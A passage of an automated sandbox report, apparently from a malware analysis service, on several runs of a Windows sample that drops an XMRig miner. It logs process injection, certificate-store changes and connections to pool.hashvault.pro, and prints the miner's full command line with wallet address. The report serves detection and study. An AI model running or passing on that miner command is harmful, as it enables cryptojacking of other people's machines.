| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4728-16-0x0000025724FE0000-0x0000025725000000-memory.dmp
memory/4728-17-0x0000025726A10000-0x0000025726A30000-memory.dmp
memory/4728-18-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-20-0x0000025726A50000-0x0000025726A70000-memory.dmp
memory/4728-19-0x0000025726A30000-0x0000025726A50000-memory.dmp
memory/4728-21-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-22-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-25-0x0000025726A50000-0x0000025726A70000-memory.dmp
memory/4728-24-0x0000025726A30000-0x0000025726A50000-memory.dmp
memory/4728-23-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-26-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-27-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-28-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-29-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-30-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-31-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-32-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-33-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-34-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-35-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-36-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-37-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-38-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-39-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-40-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-41-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-42-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-43-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-44-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-45-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-46-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-47-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-48-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-49-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-50-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-51-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-52-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-53-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-54-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-55-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-56-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-57-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-58-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-59-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-60-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-61-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-62-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-63-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-64-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-65-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-66-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-67-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-68-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-69-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-70-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-71-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-72-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-73-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-74-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-75-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-76-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-77-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-78-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-79-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-80-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-81-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-82-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-83-0x00007FF733570000-0x00007FF734073000-memory.dmp
memory/4728-84-0x00007FF733570000-0x00007FF734073000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:01
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4432 wrote to memory of 1960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:56
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5728 wrote to memory of 1904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4048 wrote to memory of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:49
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4148 wrote to memory of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4148 wrote to memory of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/8-16-0x000002931C6C0000-0x000002931C6E0000-memory.dmp
memory/8-17-0x00000293AEA70000-0x00000293AEA90000-memory.dmp
memory/8-18-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-19-0x00000293AEEB0000-0x00000293AEED0000-memory.dmp
memory/8-20-0x00000293AF0E0000-0x00000293AF100000-memory.dmp
memory/8-21-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-22-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-25-0x00000293AF0E0000-0x00000293AF100000-memory.dmp
memory/8-24-0x00000293AEEB0000-0x00000293AEED0000-memory.dmp
memory/8-23-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-26-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-27-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-28-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-29-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-30-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-31-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-32-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-33-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-34-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-35-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-36-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-37-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-38-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-39-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-40-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-41-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-42-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-43-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-44-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-45-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-46-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-47-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-48-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-49-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-50-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-51-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-52-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-53-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-54-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-55-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-56-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-57-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
